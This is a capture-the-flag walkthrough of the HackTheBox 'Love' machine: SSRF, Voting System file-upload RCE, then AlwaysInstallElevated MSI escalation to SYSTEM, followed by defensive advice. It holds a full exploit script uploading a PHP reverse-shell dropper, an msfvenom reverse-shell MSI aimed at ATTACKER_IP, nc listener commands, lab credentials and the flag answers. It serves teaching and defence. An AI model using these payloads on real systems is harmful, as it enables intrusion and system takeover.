[Machines] [Easy] Love: File Scanner SSRF + Voting System RCE + Windows Registry (AlwaysInstallElevated) MSI Privilege Escalation
Word count: 1913 | 2025-08-22 12:23:36

Windows Penetration Test Walkthrough: From SSRF to MSI Privilege Escalation

1. Target Reconnaissance

1.1 Initial Scan Results

Target IP: 10.10.10.239 (love.htb)

Open ports and services:

  • 80/tcp: Apache httpd 2.4.46 (Voting System using PHP)
  • 135/tcp: Microsoft Windows RPC
  • 139/tcp: Microsoft Windows netbios-ssn
  • 443/tcp: Apache httpd 2.4.46 (SSL, commonName=staging.love.htb)
  • 445/tcp: Windows 10 Pro 19042 microsoft-ds
  • 3306/tcp: MySQL/MariaDB (rejects connections from our address)
  • 5000/tcp: Apache httpd 2.4.46
  • 5040/tcp: unknown service
  • 5985/tcp: WinRM (Microsoft HTTPAPI httpd 2.0)
  • 5986/tcp: WinRM over SSL
  • 7680/tcp: unknown service
  • 47001/tcp: Microsoft HTTPAPI httpd 2.0
  • several high ports: Microsoft Windows RPC

1.2 Hostname Discovery

From the commonName in the HTTPS certificate on port 443:

  • Main domain: love.htb
  • Subdomain: staging.love.htb

2. Exploitation Path

2.1 Initial Access - SSRF Exploitation

  1. Add both names to the local hosts file:

    10.10.10.239 love.htb staging.love.htb
    
  2. Browse the staging subdomain:

    • http://staging.love.htb/
    • http://staging.love.htb/beta.php (a "file scanner" that fetches a URL supplied by the user, the likely SSRF point)
  3. Use the SSRF to fetch content from the host's own loopback interface, which is how the firewall-restricted services and the loopback-only content on port 80 become reachable:

    • http://127.0.0.1:80
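Once a URL-fetching endpoint is suspected of SSRF, the practical next step is to push a short list of loopback targets through it and look for responses that differ from a closed-port baseline. The helper below is an added example, not part of the original write-up: it assumes the scanner accepts the target URL in a POST form field named `file` and that you pass in the scanner's endpoint URL yourself (both taken from the beta.php form; the field name here is an assumption), and the target list and the offline fake sender are constructed for the demonstration.

```python
"""Differential port probe through an SSRF-capable URL fetcher (added example)."""
from typing import Callable, Dict, Iterable, List, Tuple

# Constructed list of loopback targets worth checking: 80 and 5000 are Apache
# on this host, 3306 is the MySQL service that refuses external clients.
INTERNAL_TARGETS = [
    "http://127.0.0.1:80",
    "http://127.0.0.1:5000",
    "http://127.0.0.1:3306",
]

# A sender fetches one target through the SSRF point and returns (status, body).
Sender = Callable[[str], Tuple[int, str]]


def make_form_sender(scanner_url: str, field: str = "file") -> Sender:
    """Build a sender that POSTs the target URL to the scanner endpoint.
    scanner_url and the field name are assumptions; read them off the beta.php form."""
    import requests  # imported lazily so the offline sample below needs no network stack

    session = requests.Session()

    def send(target: str) -> Tuple[int, str]:
        r = session.post(scanner_url, data={field: target}, timeout=10)
        return r.status_code, r.text

    return send


def probe_internal(send: Sender, targets: Iterable[str],
                   baseline: str = "http://127.0.0.1:1",
                   min_delta: int = 32) -> Dict[str, dict]:
    """Fetch each target via the SSRF and compare it with a closed-port baseline.
    A target is 'interesting' when its status differs from the baseline or its
    body length differs by more than min_delta bytes."""
    base_status, base_body = send(baseline)
    results: Dict[str, dict] = {}
    for target in targets:
        status, body = send(target)
        results[target] = {
            "status": status,
            "length": len(body),
            "interesting": status != base_status
                           or abs(len(body) - len(base_body)) > min_delta,
        }
    return results


def interesting_targets(results: Dict[str, dict]) -> List[str]:
    """Targets whose response stood out from the closed-port baseline."""
    return [t for t, r in results.items() if r["interesting"]]


# Constructed fake sender for running offline: only port 80 returns real content,
# everything else gets the scanner's generic error text.
def _fake_send(target: str) -> Tuple[int, str]:
    if target == "http://127.0.0.1:80":
        return 200, "<html>" + "A" * 500 + "</html>"
    return 200, "Connection refused"


if __name__ == "__main__":
    for t in interesting_targets(probe_internal(_fake_send, INTERNAL_TARGETS)):
        print("differs from baseline:", t)
```

Against a real scanner, swap `_fake_send` for `make_form_sender("http://staging.love.htb/<scanner-endpoint>")`. Comparing against a closed port rather than against an absolute size matters because many scanners wrap whatever they fetch in their own page template, so the only reliable signal is the difference between "refused" and "something came back".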

2.2 Voting System RCE

Target application: Voting System 1.0 (PHP/MySQLi)

  1. Locate the admin login page:

    • http://love.htb/admin/login.php
    • Admin credentials: admin:@LoveIsInTheAir!!!!
  2. Exploit the authenticated file upload (Python script):

import requests

# Target and attacker parameters
IP = "love.htb"
USERNAME = "admin"
PASSWORD = "@LoveIsInTheAir!!!!"
REV_IP = "ATTACKER_IP"      # listener address
REV_PORT = "ATTACKER_PORT"  # listener port; must match the nc -lvnp port used below

# Admin panel URLs. voters_add.php is the authenticated upload point and
# stores the voter "photo" under the web-accessible /images/ directory.
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

# PHP dropper: decodes an embedded reverse-shell executable, writes it to
# C:\windows\temp and runs it with the listener port and IP as arguments.
# The base64 blob (the compressed executable) is elided here.
payload = """<?php
header('Content-type: text/plain');
$ip = "IIPP";
$port = "PPOORRTT";
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res = "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>"""
# Substitute the listener address and port into the PHP source
payload = payload.replace("IIPP", REV_IP)
payload = payload.replace("PPOORRTT", REV_PORT)

s = requests.Session()

def getCookies():
    # The first request establishes the PHP session cookie
    r = s.get(INDEX_PAGE)
    return r.cookies

def login():
    cookies = getCookies()
    data = {
        "username":USERNAME,
        "password":PASSWORD,
        "login":""
    }
    r = s.post(LOGIN_URL, data=data, cookies=cookies)
    # Only the status code is checked here; confirm on the listener that the shell arrives
    if r.status_code == 200:
        print("Logged in")
        return True
    else:
        return False

def sendPayload():
    if login():
        global payload
        payload = bytes(payload, encoding="UTF-8")
        # The part is declared as image/png, but the handler keeps the client
        # filename and never inspects the content, so it is saved as /images/shell.php
        files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) }
        data = {
            "firstname":"a",
            "lastname":"b",
            "password":"1",
            "add":""
        }
        r = s.post(VOTE_URL, data=data, files=files)
        if r.status_code == 200:
            print("Poc sent successfully")
        else:
            print("Error")

def callShell():
    # Requesting the uploaded file runs the dropper, which spawns the reverse shell
    r = s.get(CALL_SHELL, verify=False)
    if r.status_code == 200:
        print("Shell called, check your listener")

print("Start a nc listener on the port you chose above and run...")
sendPayload()
callShell()
  3. Execution steps:

    • Start a Netcat listener: nc -lvnp 8888 (the port must match REV_PORT in the script)
    • Run the Python script above
    • The script:
      • logs in to the admin panel with the credentials above
      • uploads the malicious PHP file as the voter photo, declared as an image
      • requests the uploaded file to trigger the reverse shell
  4. Initial foothold:

    • user.txt: bd7b936fc2e65edc3f4626d4690e85d1

3. Privilege Escalation

3.1 Check the AlwaysInstallElevated Registry Values

  1. Query the value in both hives:

    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    

    Only when both values are 1 does the Windows Installer service run any package this user installs with SYSTEM privileges; a 1 in just one hive, or a missing value, is not exploitable.
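The "both hives must be 1" rule is easy to get wrong in a post-exploitation script, so here is an added example (not from the original write-up) that parses the output of the two `reg query` commands above and only reports the host as exploitable when both values are present and equal to 1. The sample outputs are constructed to match reg.exe's format; `check_live_host()` runs the real queries when executed on the Windows target.

```python
"""Decide from reg.exe output whether AlwaysInstallElevated is exploitable (added example)."""
import re
import subprocess
from typing import Optional

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

# Matches the value line reg.exe prints, e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
_VALUE_LINE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.MULTILINE
)


def parse_reg_dword(output: str) -> Optional[int]:
    """Return the DWORD from `reg query ... /v AlwaysInstallElevated` output,
    or None when reg.exe reported that the key or value does not exist."""
    m = _VALUE_LINE.search(output)
    return int(m.group(1), 16) if m else None


def always_install_elevated(hklm_output: str, hkcu_output: str) -> bool:
    """Exploitable only when the machine AND the user policy value are both 1.
    A missing value (None) or 0 in either hive means msiexec will not elevate."""
    return parse_reg_dword(hklm_output) == 1 and parse_reg_dword(hkcu_output) == 1


def check_live_host() -> bool:
    """Run the two reg.exe queries on the Windows target itself."""
    outputs = []
    for hive in ("HKLM", "HKCU"):
        proc = subprocess.run(
            ["reg", "query", f"{hive}\\{INSTALLER_KEY}", "/v", VALUE_NAME],
            capture_output=True, text=True,
        )
        outputs.append(proc.stdout + proc.stderr)  # the 'unable to find' message may go to stderr
    return always_install_elevated(*outputs)


# Constructed samples of reg.exe output for the offline check.
SAMPLE_HKLM_SET = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
SAMPLE_HKCU_SET = (
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
SAMPLE_HKCU_ZERO = SAMPLE_HKCU_SET.replace("0x1", "0x0")
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\r\n"

if __name__ == "__main__":
    print("both set    :", always_install_elevated(SAMPLE_HKLM_SET, SAMPLE_HKCU_SET))
    print("user is 0   :", always_install_elevated(SAMPLE_HKLM_SET, SAMPLE_HKCU_ZERO))
    print("user missing:", always_install_elevated(SAMPLE_HKLM_SET, SAMPLE_MISSING))
```

Parsing the DWORD instead of grepping for the string "1" avoids a false positive on values such as 0x10, and treating a missing key as "not set" avoids the classic mistake of reading an error message as success.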

3.2 Review the AppLocker Policy

  1. Dump the effective AppLocker rule collections:

    get-applockerpolicy -effective | select -expandproperty rulecollections
    
  2. Key findings:

    • Everyone may run digitally signed Windows Installer files
    • Windows Installer files under %systemdrive%\Windows\Installer may run
    • The local Administrators group may run any Windows Installer file
    • Execution from %OSDRIVE%\Administration\ is denied

    Before concluding that these rules block anything, check that the Windows Installer collection is actually in Enforce mode and that the Application Identity service (AppIDSvc) is running; AppLocker rules are not enforced without both.

3.3 Build and Run a Malicious MSI

  1. Generate a reverse-shell MSI with msfvenom:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o rev.msi
    
  2. Transfer rev.msi to the target, start a listener on port 443, and run the install:

    msiexec /quiet /i rev.msi
    

    Because AlwaysInstallElevated is set in both hives, the Windows Installer service runs the package as NT AUTHORITY\SYSTEM, and the reverse shell arrives with SYSTEM privileges.

  3. System flag:

    • root.txt: 7b6783dd4065da252198f7ab8ddf64d1

4. Key Takeaways

  1. SSRF exploitation:

    • Discover internal services through the staging subdomain
    • Use the SSRF to bypass the firewall and reach services restricted to the host itself
  2. Authenticated file-upload RCE:

    • Identify the vulnerable application (Voting System 1.0)
    • Use the admin credentials to reach the back end
    • Execute arbitrary code through the unvalidated file upload
  3. Windows privilege escalation:

    • Abuse of the AlwaysInstallElevated registry values
    • Working around the AppLocker policy
    • Privileged execution of MSI installers
  4. Lateral-movement surface (exposed on this host, not needed for the chain above):

    • WinRM (5985/5986) for remote management
    • SMB (445) share enumeration

5. Defensive Recommendations

  1. SSRF:

    • Restrict what the server-side fetcher can reach (egress filtering; no loopback, link-local or RFC 1918 destinations)
    • Validate user-supplied URLs on scheme, host, port and resolved address, and do not follow redirects
    • Use an allowlist of permitted hosts rather than a blocklist
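An allowlist check is only as good as the cases it covers: credentials in the authority part, IPv4-mapped IPv6 loopback, and a hostname that resolves to one public and one internal address are the usual ways a "validated" URL still reaches 127.0.0.1. The following validator is an added example, not code from the original write-up or from Voting System; the allowlisted hostnames and the fake resolver table are constructed, and in production `resolve_all` (real DNS) is the resolver.

```python
"""Allowlist-based check of a user-supplied URL before the server fetches it (added example)."""
import ipaddress
import socket
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# Hypothetical allowlist of hosts the scanner is permitted to fetch from.
ALLOWED_HOSTS = {"scanme.example.com", "files.example.com"}

Resolver = Callable[[str], Iterable[str]]


def resolve_all(host: str) -> List[str]:
    """Every A/AAAA answer for host (the production resolver; not used offline)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped               # ::ffff:127.0.0.1 is still loopback
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url: str, resolve: Resolver = resolve_all) -> str:
    """Return url if it is safe for the server to fetch, otherwise raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")  # foils http://allowed@127.0.0.1
    host = parts.hostname
    if not host or host.lower() not in ALLOWED_HOSTS:
        raise ValueError(f"host not in allowlist: {host!r}")
    port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    addrs = list(resolve(host))
    if not addrs:
        raise ValueError("host does not resolve")
    for ip in addrs:                          # every answer must be public, not just the first
        if not is_public_address(ip):
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return url


def is_safe_fetch_url(url: str, resolve: Resolver = resolve_all) -> bool:
    """Boolean wrapper around validate_fetch_url for callers that just want a verdict."""
    try:
        validate_fetch_url(url, resolve)
        return True
    except ValueError:
        return False


# Constructed resolver for offline use: names mapped to fixed answers.
_FAKE_DNS = {
    "scanme.example.com": ["93.184.216.34"],
    "files.example.com": ["93.184.216.35", "10.0.0.5"],  # split answer with one internal address
}


def fake_resolve(host: str) -> List[str]:
    return _FAKE_DNS.get(host.lower(), [])


if __name__ == "__main__":
    for u in ("https://scanme.example.com/report", "http://127.0.0.1:80",
              "http://scanme.example.com@127.0.0.1/", "https://files.example.com/x"):
        print(f"{u:45} -> {'allowed' if is_safe_fetch_url(u, fake_resolve) else 'rejected'}")
```

Validation and fetching are two separate DNS lookups, so a rebinding attacker can pass the check and then point the name at an internal address. Connect to the address that was validated (and send the hostname in the Host header or SNI) rather than resolving again in the HTTP client.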
  2. Web application security:

    • Change default credentials
    • Validate uploaded files (extension allowlist, content checks, random server-side names, no script execution in the upload directory)
    • Keep third-party components patched
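The voters_add.php upload above succeeds because the handler trusts the client's filename and the declared Content-Type. The hardened check below is an added example, not code from Voting System or from the original write-up: it ignores the declared MIME type entirely, allowlists extensions, verifies the leading bytes match the extension, and issues a random storage name; the sample uploads are constructed.

```python
"""Hardened image-upload check for a voter photo (added example, not Voting System code)."""
import os
import secrets

# Extension allowlist with the magic bytes each file type must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_image_upload(client_filename: str, data: bytes) -> str:
    """Check an upload and return the extension it may be stored under.

    The declared Content-Type is deliberately not a parameter: it is attacker
    controlled, and spoofing it as image/png is exactly what the exploit does."""
    name = os.path.basename(client_filename.replace("\\", "/"))   # drop any path component
    if "\x00" in name:
        raise UploadRejected("null byte in filename")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in MAGIC:                                           # rejects shell.php outright
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data or len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized upload")
    if not data.startswith(MAGIC[ext]):                            # rejects PHP renamed to .png
        raise UploadRejected("file content does not match its extension")
    return ext


def storage_name(ext: str) -> str:
    """Random server-side name: the client's filename is never reused on disk."""
    return f"{secrets.token_hex(16)}.{ext}"


def is_acceptable_upload(client_filename: str, data: bytes) -> bool:
    try:
        validate_image_upload(client_filename, data)
        return True
    except UploadRejected:
        return False


# Constructed sample uploads.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64

if __name__ == "__main__":
    for fname, blob in (("shell.php", PHP_SHELL), ("shell.png", PHP_SHELL), ("photo.png", PNG_STUB)):
        print(f"{fname:12} -> {'accepted' if is_acceptable_upload(fname, blob) else 'rejected'}")
```

A magic-byte check does not catch a polyglot (a valid PNG with PHP appended), and a name like shell.php.png still passes. Both are why the stored file gets a random name and must live somewhere the web server will not execute scripts, ideally outside the document root and served through a handler that sets the Content-Type itself.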
  3. Privilege escalation:

    • Disable AlwaysInstallElevated: the "Always install with elevated privileges" policy under both Computer Configuration and User Configuration > Administrative Templates > Windows Components > Windows Installer must be Disabled or Not Configured
    • Configure strict AppLocker rules in Enforce mode, with the Application Identity service running
    • Restrict who may run MSI installers
  4. System hardening:

    • Close unnecessary service ports
    • Apply the principle of least privilege
    • Enable Windows Defender or an equivalent endpoint protection product